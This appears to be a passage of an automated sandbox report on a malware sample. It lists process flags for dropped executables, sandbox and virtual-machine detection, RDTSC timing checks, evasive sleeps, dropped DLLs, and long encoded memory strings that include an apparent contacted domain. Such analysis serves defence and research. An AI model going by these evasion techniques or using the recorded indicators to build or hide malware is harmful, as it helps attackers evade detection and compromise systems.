Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file.exe, 00000000.00000002.313456066.0000000000939000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\98D7.exe RDTSC instruction interceptor: First address: 00000001405FFCC5 second address: 00000001405FFCCC instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 rcr edx, 6Dh 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\98D7.exe RDTSC instruction interceptor: First address: 00000001405FFCCC second address: 00000001405FFCE7 instructions: 0x00000000 rdtsc 0x00000002 rcl dl, cl 0x00000004 ror cl, 1 0x00000006 mov dx, 05D0h 0x0000000a movzx ax, bl 0x0000000e sub cl, FFFFFFCCh 0x00000011 clc 0x00000012 neg cl 0x00000014 inc eax 0x00000015 xor bh, cl 0x00000017 setl dl 0x0000001a lahf 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe RDTSC instruction interceptor: First address: 00000001405FFCC5 second address: 00000001405FFCCC instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 rcr edx, 6Dh 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe RDTSC instruction interceptor: First address: 00000001405FFCCC second address: 00000001405FFCE7 instructions: 0x00000000 rdtsc 0x00000002 rcl dl, cl 0x00000004 ror cl, 1 0x00000006 mov dx, 05D0h 0x0000000a movzx ax, bl 0x0000000e sub cl, FFFFFFCCh 0x00000011 clc 0x00000012 neg cl 0x00000014 inc eax 0x00000015 xor bh, cl 0x00000017 setl dl 0x0000001a lahf 0x0000001b rdtsc
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3568 Thread sleep time: -450000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe TID: 2992 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\98D7.exe TID: 5164 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pliu.exe TID: 3516 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\pliu.exe TID: 4604 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\98D7.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 410 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 447 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 855 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 842 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db.dll Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FB61.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\12C0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iueg.aappatey.comiueg.aappatey.comFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259
Source: 98D7.exe, 00000010.00000003.431710822.000000000051E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rRM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6Y@sRHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s
Source: llpb1133.exe, 00000014.00000003.441864243.00000000004D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 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
Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: 98D7.exe, 00000010.00000003.430490083.00000000004D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 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
Source: 98D7.exe, 00000010.00000003.461580588.0000000000519000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461569848.0000000000516000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkqej
